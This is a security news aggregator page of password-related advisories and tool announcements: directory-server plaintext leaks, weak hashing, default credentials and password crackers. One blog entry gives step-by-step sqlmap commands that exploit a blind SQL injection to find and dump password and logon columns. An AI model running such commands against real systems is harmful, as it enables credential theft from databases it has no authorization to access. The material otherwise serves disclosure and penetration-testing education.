«
Expand/Collapse
340 items tagged "password"
Related tags:
libcrypt [+],
crypt [+],
luseradd [+],
hash [+],
wire [+],
router [+],
relational database management system [+],
relational database management [+],
red hat security [+],
red [+],
information disclosure vulnerability [+],
hat [+],
hacks [+],
database management system [+],
d link [+],
credentials [+],
cleartext [+],
cisco security advisory [+],
cisco security [+],
advisory [+],
2wire [+],
windows [+],
user [+],
safe [+],
picture [+],
passwords [+],
manager [+],
linux [+],
authentication methods [+],
vulnerability [+],
weak [+],
snare [+],
shellcode [+],
reset [+],
remote [+],
plain text passwords [+],
password encryption [+],
lightweight directory access protocol [+],
kaspersky [+],
interface [+],
hacking [+],
drupal [+],
directory [+],
camera [+],
authentication [+],
wrt [+],
wibiya [+],
visual tools [+],
visual [+],
video units [+],
third party [+],
text password [+],
text [+],
telnet server [+],
submission [+],
storage center [+],
stack buffer [+],
ssh [+],
smartftp [+],
singtel [+],
sflog [+],
setup wizard [+],
saved [+],
reporting system [+],
remote shell [+],
registrar software [+],
read [+],
qualitynet [+],
proof [+],
pop3 authentication [+],
pop [+],
polycom [+],
policy [+],
poison ivy 2 [+],
poison [+],
phone [+],
pcwrunas [+],
pc welt [+],
pastebay [+],
password submission [+],
password manager [+],
password log [+],
passmanlite [+],
owncloud [+],
opendrive [+],
obfuscation [+],
network storage [+],
nas [+],
moroccotel [+],
mobile users [+],
md5 hash [+],
master password [+],
malicious script code [+],
linux ships [+],
linksys wrt54g [+],
linksys [+],
link dir [+],
layton [+],
keypass [+],
kernel [+],
jd edwards [+],
ivy [+],
ip phone [+],
ios [+],
installation [+],
insertion [+],
inclusion [+],
huawei [+],
helpbox [+],
greenstone [+],
gateway router [+],
g wireless [+],
ftp client [+],
forgery [+],
emesene [+],
drive [+],
direct access [+],
digital library software [+],
design flaw [+],
cross [+],
conduit [+],
conceptronic [+],
code insertion [+],
cms [+],
cisco network registrar [+],
cisco network [+],
change admin password [+],
cameras [+],
c series [+],
bypass [+],
buffer overflow [+],
brute forcer [+],
boxes [+],
belkin [+],
authentication system [+],
arbitrary users [+],
application configuration [+],
apple ios [+],
agilebits [+],
administrative password [+],
admin password [+],
account [+],
access [+],
1password [+],
disclosure [+],
unix passwords [+],
unix [+],
ripper [+],
password cracker [+],
john [+],
flavors [+],
webapps [+],
tom lane [+],
statistical database [+],
solar designer [+],
small linux [+],
site [+],
singapore [+],
service vulnerability [+],
script [+],
safe cracker [+],
root user [+],
root [+],
read admin [+],
proper password [+],
plugs [+],
permutations [+],
perl script [+],
passwordsafe [+],
password combination [+],
pack [+],
oracle [+],
ophcrack [+],
null [+],
network administrators [+],
mysql [+],
memory trade [+],
mandriva linux [+],
mandriva [+],
information disclosure [+],
information [+],
hydra [+],
hotmail [+],
hashing [+],
hashes [+],
generation [+],
flaw [+],
dongle [+],
diagnostic purposes [+],
denial of service [+],
day [+],
cve [+],
crypt function [+],
cracker [+],
countless services [+],
cisco [+],
bruteforce password [+],
brute force [+],
ballast [+],
analysis stage [+],
analysis [+],
Tools [+],
password disclosure [+],
your [+],
xss [+],
windows pcs [+],
windows password cracker [+],
western digital [+],
weekend security [+],
vijay [+],
usernames [+],
usb memory stick [+],
usb hard drive [+],
usb device [+],
usb [+],
unauthorized [+],
troubles [+],
tracker [+],
toshiba laptops [+],
token authentication [+],
time passwords [+],
thinkpad [+],
theft [+],
tcexam [+],
swedish [+],
stung [+],
stop hackers [+],
stop [+],
stealing [+],
sqlmap [+],
sql injection [+],
source [+],
solaris [+],
software filter [+],
service password [+],
service [+],
server side applications [+],
self service [+],
self [+],
security vulnerability [+],
security toolkit [+],
security flaws [+],
secure [+],
scrutinizer [+],
scanner [+],
scandal [+],
sage reveals [+],
sage [+],
safer use [+],
s 700 [+],
rxs [+],
retired [+],
reset request [+],
request tracker [+],
request [+],
redaxscript [+],
rainbow [+],
pypam [+],
protection law [+],
protection [+],
processes [+],
predictable [+],
power [+],
portable usb hard drive [+],
pdf password cracker [+],
pdf [+],
pcs [+],
patrick schaumont [+],
patches [+],
patch plugs [+],
password resets [+],
password protection [+],
password managers [+],
password hashes [+],
password generation [+],
password bug [+],
password authentication [+],
pam [+],
open source [+],
open [+],
null byte [+],
mysqlpasswordauditor [+],
mysql password [+],
mypath [+],
mydatabase [+],
modem [+],
mobile security [+],
military [+],
microcontrollers [+],
marco [+],
management [+],
lock [+],
line [+],
leaves [+],
lastpass [+],
laptops [+],
laptop case [+],
laptop [+],
kpn [+],
joomla [+],
jdedwards [+],
iphone [+],
includes [+],
ieee [+],
http 192 168 1 1 [+],
htc [+],
hints [+],
hard disk [+],
hard [+],
hackers [+],
graphics processing unit [+],
graphical user interface [+],
gpu [+],
freecom [+],
for [+],
foil [+],
firmware [+],
fingerprint scanner [+],
filebound [+],
file [+],
factor authentication [+],
facebook [+],
exploits [+],
encryption [+],
easily [+],
django [+],
divided [+],
decode [+],
dbo [+],
dave ferguson [+],
database [+],
d mydatabase [+],
cross site scripting [+],
cracking passwords [+],
cracking password [+],
correct password [+],
consumer concern [+],
congress [+],
compromises [+],
cktricky [+],
cisco secure [+],
cisco patches [+],
cisco patch [+],
chronos [+],
change [+],
cent [+],
c logonid [+],
bungle [+],
brute force attack [+],
brute [+],
broken [+],
bios [+],
bind [+],
beaglebone [+],
bacula [+],
auditing software [+],
attiny [+],
arm processor [+],
android [+],
admits [+],
acs [+],
access control system [+],
access control [+],
abusing [+],
Pentesting [+],
Hardware [+],
default [+],
server [+],
security [+],
year,
xampp,
wsc,
wpa wpa2,
wpa,
workstation,
wordlists,
wordlist generator,
wordlist,
word list,
winrar password,
winrar,
windows machine,
wep,
way,
washington monument,
washington,
vulnerabilities,
vnc server,
vnc,
virtual drives,
videoconferencing,
vbulletin,
validation,
username,
txt,
twitter,
tutorial,
triggers,
torrent file,
toor,
tinypug,
timeclock software,
three times,
this,
thc hydra,
thanks in advance,
tgz,
tar gz,
tar,
system,
ssd,
sql,
sophos,
someone,
somebody,
solid state disk,
snuffs,
smf,
sheer number,
sha,
session cookie,
session,
security study,
security issue,
secunia,
salve,
rsmangler,
routers,
router password,
root password,
roomwizard,
research students,
remote exploit,
recovery,
random numbers,
random number generation,
ram disk,
quot,
proper noun,
program,
processing,
prewikka,
post,
porta 80,
popular,
plug ins,
phpvidz,
php,
phishing,
penetration,
password thanks,
password reset,
password lists,
password keeper,
password field,
password column,
passphrase,
owa,
openpgp key,
online,
nvidia 9800gtx,
ntds,
nokia,
network penetration,
network hack,
network,
netkeys,
need,
mybb,
msf,
mozilla firefox,
mozilla,
mike,
metasploit,
member password,
member,
media,
matching,
martin,
mail headers,
machine,
lst,
login cracker,
login,
lm hash,
list,
limiting factor,
keyboard,
key generator,
keeper,
keepass,
kde,
just,
issue,
intel machines,
html url,
hijacking,
handshake,
hack,
google,
glsa,
gia,
georgia tech,
generator,
gawker,
foursquare,
firefox,
file password,
field,
feture,
f king,
exploitation,
esoftpro,
encrypted password,
employee timeclock,
email password,
email,
efipw,
e mail addresses,
dowgroup,
domain controller,
dogbert,
dit,
directory domain,
digit password,
digit,
dictionary word,
dictionary attack,
decrypt,
database password,
darknet,
darkmysqli,
dafftin,
custom word,
cupp,
cuda,
ctf,
csrf,
crunch crunch,
crunch,
cracking,
coreftp,
column,
code,
cms password,
cloud,
clock time,
cisco unified,
chrome,
chntpw,
cfdisk,
byword,
bssid,
bruteforcer,
bruteforce attack,
book,
body,
board search,
blueberry,
bios passwords,
becomes,
bcc mail,
automated,
attacker,
assistance,
apple efi,
and,
amazon,
aircrack,
adrian,
administrative,
administration service,
admin,
adan,
adam,
account takeover,
abram,
abraham,
abel,
abdullah,
Wireless,
Supporto,
Support,
Software,
Newbie,
Idiots,
Howto,
General,
Fixes,
ExploitsVulnerabilities,
Discussion,
Corner,
Bugs,
BackTrack,
Area
-
-
19:15
»
Packet Storm Security Advisories
Snare for Linux ships with a web interface that can be used for viewing log data and configuring the agent. In the web interface at /remote, a user is able to set a password for remote configuration of the agent. The rendered page contains the field "RemotePassword" with its input type set to password which masks the password in the interface, however this is purely aesthetic. By inspecting the page source and examining the RemotePassword field, it is possible to retrieve the MD5 hash of the current password. Versions prior to 1.7.0 are affected.
-
19:15
»
Packet Storm Security Recent Files
Snare for Linux ships with a web interface that can be used for viewing log data and configuring the agent. In the web interface at /remote, a user is able to set a password for remote configuration of the agent. The rendered page contains the field "RemotePassword" with its input type set to password which masks the password in the interface, however this is purely aesthetic. By inspecting the page source and examining the RemotePassword field, it is possible to retrieve the MD5 hash of the current password. Versions prior to 1.7.0 are affected.
-
19:15
»
Packet Storm Security Misc. Files
Snare for Linux ships with a web interface that can be used for viewing log data and configuring the agent. In the web interface at /remote, a user is able to set a password for remote configuration of the agent. The rendered page contains the field "RemotePassword" with its input type set to password which masks the password in the interface, however this is purely aesthetic. By inspecting the page source and examining the RemotePassword field, it is possible to retrieve the MD5 hash of the current password. Versions prior to 1.7.0 are affected.
-
-
9:12
»
Packet Storm Security Exploits
Greenstone Digital Library Software suffers from cross site scripting, password file disclosure, broken salt, and log forging vulnerabilities.
-
9:12
»
Packet Storm Security Misc. Files
Greenstone Digital Library Software suffers from cross site scripting, password file disclosure, broken salt, and log forging vulnerabilities.
-
-
15:22
»
Packet Storm Security Advisories
Various Huawei products use DES without any salt to encrypt passwords. Included vulnerable are the Huawei Quidway series and Huawei CX600.
-
-
16:00
»
SecuriTeam
Self Service Password is prone to an unspecified vulnerability regarding an LDAP injection.
-
-
18:32
»
Packet Storm Security Exploits
Visual Tools DVR VS Series versions 3.0.6.16 and below and VX Series versions 4.2.19.2 and below suffer from administrative password disclosure, default administrative password, log file disclosure, command injection, and insecure permission vulnerabilities.
-
18:32
»
Packet Storm Security Recent Files
Visual Tools DVR VS Series versions 3.0.6.16 and below and VX Series versions 4.2.19.2 and below suffer from administrative password disclosure, default administrative password, log file disclosure, command injection, and insecure permission vulnerabilities.
-
18:32
»
Packet Storm Security Misc. Files
Visual Tools DVR VS Series versions 3.0.6.16 and below and VX Series versions 4.2.19.2 and below suffer from administrative password disclosure, default administrative password, log file disclosure, command injection, and insecure permission vulnerabilities.
-
-
23:39
»
Packet Storm Security Advisories
Passcape Software has discovered a serious problem with the Picture password and PIN authentication methods in the upcoming release of Windows 8.
-
23:39
»
Packet Storm Security Advisories
Passcape Software has discovered a serious problem with the Picture password and PIN authentication methods in the upcoming release of Windows 8.
-
23:39
»
Packet Storm Security Recent Files
Passcape Software has discovered a serious problem with the Picture password and PIN authentication methods in the upcoming release of Windows 8.
-
23:39
»
Packet Storm Security Misc. Files
Passcape Software has discovered a serious problem with the Picture password and PIN authentication methods in the upcoming release of Windows 8.
-
23:39
»
Packet Storm Security Misc. Files
Passcape Software has discovered a serious problem with the Picture password and PIN authentication methods in the upcoming release of Windows 8.
-
-
19:32
»
Packet Storm Security Exploits
This Metasploit module exploits the default credentials of Apple iOS when it has been jailbroken and the passwords for the 'root' and 'mobile' users have not been changed.
-
19:32
»
Packet Storm Security Recent Files
This Metasploit module exploits the default credentials of Apple iOS when it has been jailbroken and the passwords for the 'root' and 'mobile' users have not been changed.
-
19:32
»
Packet Storm Security Misc. Files
This Metasploit module exploits the default credentials of Apple iOS when it has been jailbroken and the passwords for the 'root' and 'mobile' users have not been changed.
-
-
9:06
»
Packet Storm Security Exploits
LG NAS N2B1 Network Storage suffers from a remote username and password hash disclosure vulnerability. Firmware versions 2660 and below are affected.
-
9:06
»
Packet Storm Security Recent Files
LG NAS N2B1 Network Storage suffers from a remote username and password hash disclosure vulnerability. Firmware versions 2660 and below are affected.
-
9:06
»
Packet Storm Security Misc. Files
LG NAS N2B1 Network Storage suffers from a remote username and password hash disclosure vulnerability. Firmware versions 2660 and below are affected.
-
-
23:17
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
23:17
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
8:01
»
Hack a Day
Two-factor authentication allows you to use your chosen password, as well as a one-time password to help keep your services secure. The one-time passwords traditionally come from a dedicated piece of hardware, but there are also solutions for smart phones. [Patrick Schaumont] shows how a TI eZ430 Chronos Watch can be used to generate authentication [...]
-
17:00
»
SecuriTeam
The RXS-3211 IP camera is prone to an information-disclosure vulnerability.
-
16:18
»
Packet Storm Security Exploits
This Metasploit module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default 'admin' password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The 'check' command can be used to determine if the C&C target is using the default 'admin' password. Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread responsible of handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the bruteforce target is selected, a random header will be sent in case the default for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a session obtained.
-
16:18
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default 'admin' password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The 'check' command can be used to determine if the C&C target is using the default 'admin' password. Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread responsible of handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the bruteforce target is selected, a random header will be sent in case the default for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a session obtained.
-
16:18
»
Packet Storm Security Misc. Files
This Metasploit module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default 'admin' password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The 'check' command can be used to determine if the C&C target is using the default 'admin' password. Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread responsible of handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the bruteforce target is selected, a random header will be sent in case the default for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a session obtained.
-
16:02
»
Packet Storm Security Exploits
sflog! versions 1.00 and below suffer from local file inclusion, administrative password disclosure, and remote shell upload vulnerabilities.
-
16:02
»
Packet Storm Security Misc. Files
sflog! versions 1.00 and below suffer from local file inclusion, administrative password disclosure, and remote shell upload vulnerabilities.
-
-
16:53
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
16:53
»
Packet Storm Security Tools
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
16:53
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
20:43
»
Packet Storm Security Recent Files
Ballast Security felt the need to write this paper as almost countless services that we trust with our passwords are handling them irresponsibly. This is a good read for anyone who needs to store password hashes.
-
20:43
»
Packet Storm Security Misc. Files
Ballast Security felt the need to write this paper as almost countless services that we trust with our passwords are handling them irresponsibly. This is a good read for anyone who needs to store password hashes.
-
-
16:45
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1041-01 - Red Hat Directory Server is an LDAPv3 compliant server. The base packages include the Lightweight Directory Access Protocol server and command-line utilities for server administration. A flaw was found in the way Red Hat Directory Server handled password changes. If an LDAP user had changed their password, and the directory server had not been restarted since that change, an attacker able to bind to the directory server could obtain the plain text version of that user's password via the "unhashed#user#password" attribute. It was found that when the password for an LDAP user was changed, and audit logging was enabled, the new password was written to the audit log in plain text form. This update introduces a new configuration parameter, "nsslapd-auditlog-logging-hide-unhashed-pw", which when set to "on", prevents Red Hat Directory Server from writing plain text passwords to the audit log. This option can be configured in "/etc/dirsrv/slapd-[ID]/dse.ldif".
-
16:45
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-1041-01 - Red Hat Directory Server is an LDAPv3 compliant server. The base packages include the Lightweight Directory Access Protocol server and command-line utilities for server administration. A flaw was found in the way Red Hat Directory Server handled password changes. If an LDAP user had changed their password, and the directory server had not been restarted since that change, an attacker able to bind to the directory server could obtain the plain text version of that user's password via the "unhashed#user#password" attribute. It was found that when the password for an LDAP user was changed, and audit logging was enabled, the new password was written to the audit log in plain text form. This update introduces a new configuration parameter, "nsslapd-auditlog-logging-hide-unhashed-pw", which when set to "on", prevents Red Hat Directory Server from writing plain text passwords to the audit log. This option can be configured in "/etc/dirsrv/slapd-[ID]/dse.ldif".
-
16:45
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-1041-01 - Red Hat Directory Server is an LDAPv3 compliant server. The base packages include the Lightweight Directory Access Protocol server and command-line utilities for server administration. A flaw was found in the way Red Hat Directory Server handled password changes. If an LDAP user had changed their password, and the directory server had not been restarted since that change, an attacker able to bind to the directory server could obtain the plain text version of that user's password via the "unhashed#user#password" attribute. It was found that when the password for an LDAP user was changed, and audit logging was enabled, the new password was written to the audit log in plain text form. This update introduces a new configuration parameter, "nsslapd-auditlog-logging-hide-unhashed-pw", which when set to "on", prevents Red Hat Directory Server from writing plain text passwords to the audit log. This option can be configured in "/etc/dirsrv/slapd-[ID]/dse.ldif".
-
-
12:09
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1037-01 - PostgreSQL is an advanced object-relational database management system. A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
-
12:09
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-1037-01 - PostgreSQL is an advanced object-relational database management system. A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
-
12:09
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-1037-01 - PostgreSQL is an advanced object-relational database management system. A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
-
12:09
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1036-01 - PostgreSQL is an advanced object-relational database management system. A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
-
12:09
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-1036-01 - PostgreSQL is an advanced object-relational database management system. A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
-
12:09
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-1036-01 - PostgreSQL is an advanced object-relational database management system. A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
-
-
7:26
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-0997-01 - The 389 Directory Server is an LDAPv3 compliant server. The base packages include the Lightweight Directory Access Protocol server and command-line utilities for server administration. A flaw was found in the way 389 Directory Server handled password changes. If an LDAP user has changed their password, and the directory server has not been restarted since that change, an attacker able to bind to the directory server could obtain the plain text version of that user's password via the "unhashed#user#password" attribute. It was found that when the password for an LDAP user was changed, and audit logging was enabled, the new password was written to the audit log in plain text form. This update introduces a new configuration parameter, "nsslapd-auditlog-logging-hide-unhashed-pw", which when set to "on", prevents 389 Directory Server from writing plain text passwords to the audit log. This option can be configured in "/etc/dirsrv/slapd-[ID]/dse.ldif".
-
7:24
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-0958-04 - The sos package contains a set of tools that gather information from system hardware, logs and configuration files. The information can then be used for diagnostic purposes and debugging. The sosreport utility collected the Kickstart configuration file, but did not remove the root user's password from it before adding the file to the resulting archive of debugging information. An attacker able to access the archive could possibly use this flaw to obtain the root user's password. "/root/anaconda-ks.cfg" usually only contains a hash of the password, not the plain text password.
-
7:24
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-0958-04 - The sos package contains a set of tools that gather information from system hardware, logs and configuration files. The information can then be used for diagnostic purposes and debugging. The sosreport utility collected the Kickstart configuration file, but did not remove the root user's password from it before adding the file to the resulting archive of debugging information. An attacker able to access the archive could possibly use this flaw to obtain the root user's password. "/root/anaconda-ks.cfg" usually only contains a hash of the password, not the plain text password.
-
-
20:35
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-092 - Multiple vulnerabilities has been discovered and corrected in postgresql. Fix incorrect password transformation in contrib/pgcrypto's DES crypt() function (Solar Designer). If a password string contained the byte value 0x80, the remainder of the password was ignored, causing the password to be much weaker than it appeared. With this fix, the rest of the string is properly included in the DES hash. Any stored password values that are affected by this bug will thus no longer match, so the stored values may need to be updated. Ignore SECURITY DEFINER and SET attributes for a procedural language's call handler (Tom Lane). Applying such attributes to a call handler could crash the server. This advisory provides the latest versions of PostgreSQL that is not vulnerable to these issues.
-
20:35
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-092 - Multiple vulnerabilities has been discovered and corrected in postgresql. Fix incorrect password transformation in contrib/pgcrypto's DES crypt() function (Solar Designer). If a password string contained the byte value 0x80, the remainder of the password was ignored, causing the password to be much weaker than it appeared. With this fix, the rest of the string is properly included in the DES hash. Any stored password values that are affected by this bug will thus no longer match, so the stored values may need to be updated. Ignore SECURITY DEFINER and SET attributes for a procedural language's call handler (Tom Lane). Applying such attributes to a call handler could crash the server. This advisory provides the latest versions of PostgreSQL that is not vulnerable to these issues.
-
-
5:39
»
Hack a Day
While at work one day, [Marco] was approached by a colleague holding a portable USB hard drive. This hard drive – a Freecom ToughDrive – has a built-in security system requiring a password every time the drive is mounted. Somewhat predictably, the password on this hard drive had been lost, so [Marco] brute forced the password [...]
-
-
14:46
»
Packet Storm Security Exploits
The PcwRunAs software available from the PC-Welt website is prone to a trivial password recovery attack that allows local users to obtain passwords encrypted with the pcwRunAsGui.exe. pcwRunAs versions 0.4 and below are affected.
-
14:46
»
Packet Storm Security Recent Files
The PcwRunAs software available from the PC-Welt website is prone to a trivial password recovery attack that allows local users to obtain passwords encrypted with the pcwRunAsGui.exe. pcwRunAs versions 0.4 and below are affected.
-
14:46
»
Packet Storm Security Misc. Files
The PcwRunAs software available from the PC-Welt website is prone to a trivial password recovery attack that allows local users to obtain passwords encrypted with the pcwRunAsGui.exe. pcwRunAs versions 0.4 and below are affected.
-
14:30
»
Hack a Day
The biggest benefit to using the BeagleBone is it’s 700 MHz ARM processor. If you’re just messing around with basic I/O that power is going unused, but [Nuno Alves] is taking advantage of its power. He built a PDF password cracker based on the $85 development board. We recently saw how easy it is to [...]
-
-
7:01
»
Hack a Day
Like many businesses out there, [Joonas Pihlajamaa’s] employer requires him to change his password every few months. Instead of coming up with a complex, yet easy to remember password again and again, he built a small USB device to do the work for him. He dismantled an old USB memory stick, fitting it with an [...]
-
-
20:14
»
Packet Storm Security Advisories
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the Security Kernel is enabled and SignonSecurity is configured, then it is possible to retrieve the password of arbitrary users.
-
20:14
»
Packet Storm Security Recent Files
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the Security Kernel is enabled and SignonSecurity is configured, then it is possible to retrieve the password of arbitrary users.
-
20:14
»
Packet Storm Security Misc. Files
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the Security Kernel is enabled and SignonSecurity is configured, then it is possible to retrieve the password of arbitrary users.
-
-
16:57
»
Packet Storm Security Recent Files
A small application built to test the performance of a pop3 authentication system using a lot of concurrent connections. It can also be used to try lots of password against a pop3 server. It is capable of using up to 1024 sessions (or more using multiple processes). However with this amount it is capable of reducing internet connections to a crawl and also greatly increasing the load on the server.
-
16:57
»
Packet Storm Security Tools
A small application built to test the performance of a pop3 authentication system using a lot of concurrent connections. It can also be used to try lots of password against a pop3 server. It is capable of using up to 1024 sessions (or more using multiple processes). However with this amount it is capable of reducing internet connections to a crawl and also greatly increasing the load on the server.
-
16:57
»
Packet Storm Security Misc. Files
A small application built to test the performance of a pop3 authentication system using a lot of concurrent connections. It can also be used to try lots of password against a pop3 server. It is capable of using up to 1024 sessions (or more using multiple processes). However with this amount it is capable of reducing internet connections to a crawl and also greatly increasing the load on the server.
-
-
18:25
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
18:25
»
Packet Storm Security Tools
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
18:25
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
7:17
»
Carnal0wnage
So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.
To search all databases for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'
To search a specific database for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'
**note, that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs**
[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'
You'll get asked:
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
You'll want to give it a 1 first time around, it will probably give you stuff like this:
[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords
We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1
You could also just do a dump if you want to start grabbing data
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1
If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <--sometimes works, sometimes doesnt. Not sure whats up with that.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
If you just want to just pull out certain columns you can do something like this (assuming columns LogonId and Password):
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)
-CG
-
-
8:15
»
Packet Storm Security Recent Files
This is a perl script that generates a list of passwords from user-supplied input on the command line. It enables a tester the ability to create various permutations of a given password for testing.
-
8:15
»
Packet Storm Security Misc. Files
This is a perl script that generates a list of passwords from user-supplied input on the command line. It enables a tester the ability to create various permutations of a given password for testing.
-
-
10:09
»
Packet Storm Security Recent Files
